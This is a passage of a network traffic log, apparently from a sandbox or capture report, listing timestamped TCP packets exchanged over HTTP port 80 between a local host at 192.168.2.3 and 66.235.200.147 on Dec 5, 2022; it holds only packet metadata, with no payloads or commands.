Dec 5, 2022 01:32:37.957783937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.957792997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.957815886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.957825899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.957855940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.957858086 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.957885981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.957887888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.957909107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.957917929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.957926989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.957950115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.957993984 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958076000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958077908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958108902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958121061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958139896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958158016 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958173037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958178997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958204985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958216906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958236933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958267927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958292961 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958297968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958314896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958329916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958348989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958359003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958383083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958390951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958393097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958421946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958441019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958453894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958467007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958486080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958492994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958517075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958528042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958549023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958559990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958580017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958585978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958611012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958620071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958642006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958648920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958673954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958683968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958703995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958712101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958736897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958745956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958767891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958782911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958798885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958812952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958830118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958839893 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958862066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958893061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958904982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958909035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958940029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958970070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.958971977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.958981037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959002018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959031105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959037066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959063053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959069967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959086895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959103107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959132910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959134102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959162951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959167004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959192038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959194899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959220886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959228039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959238052 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959259987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959264994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959291935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959321976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959325075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959332943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959352016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959366083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959383011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959413052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959420919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959429026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959444046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959460020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959475040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959494114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959506989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959517002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959538937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959548950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959569931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959608078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959613085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959639072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959645987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959670067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959677935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959702015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959737062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959743023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959753990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959768057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959784031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959800005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959813118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959836960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959847927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959870100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959873915 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959902048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959913969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959933043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959944963 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959964037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.959975004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.959994078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960022926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960026026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960036039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960058928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960088015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960108042 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960119963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960140944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960154057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960184097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960201979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960215092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960239887 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960246086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960263968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960277081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960308075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960314989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960330009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960340023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960362911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960371017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960377932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960402966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960433006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960433006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960443020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960464954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960479975 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960495949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960510969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960526943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960557938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960582972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960589886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960618019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960621119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960650921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960653067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960660934 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960686922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960704088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960716963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960724115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960747004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960757017 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960779905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960807085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960808039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960819006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960836887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960867882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960896969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960920095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960920095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960927963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960954905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960959911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.960983992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.960992098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961019993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961023092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961033106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961061001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961064100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961091995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961103916 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961123943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961136103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961154938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961169004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961184978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961199999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961215973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961246014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961258888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961277008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961282969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961308002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961309910 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961322069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961338997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961369038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961373091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961386919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961400032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961412907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961432934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961440086 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961463928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961472034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961496115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961505890 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961528063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961560011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961589098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961618900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961647987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961678028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961707115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961735964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961747885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961767912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961800098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961828947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961843967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961853981 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961859941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961893082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961906910 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961919069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961924076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961941004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961955070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.961967945 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.961986065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962018013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962025881 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962049007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962057114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962080002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962090969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962112904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962120056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962145090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962150097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962174892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962205887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962215900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962246895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962255955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962277889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962285995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962310076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962321043 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962341070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962352037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962373018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962380886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962404966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962413073 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962436914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962455034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962466955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962485075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962498903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962528944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962538958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962562084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962569952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962593079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962601900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962625027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962632895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962656975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962665081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962687969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962718010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962728977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962748051 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962755919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962779045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962788105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962810993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962819099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962842941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962852001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962886095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962889910 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962918997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962934971 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962949991 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962968111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.962980986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.962997913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963011980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963021994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963043928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963083982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963107109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963136911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963148117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963169098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963176966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963201046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963208914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963232040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963244915 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963263035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963274002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963299990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963320017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963350058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963380098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963387012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963412046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963416100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963444948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963449001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963474989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963479996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963505983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963511944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963537931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963541985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963567972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.963579893 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.963601112 CET	80	49705	66.235.200.147	192.168.2.3
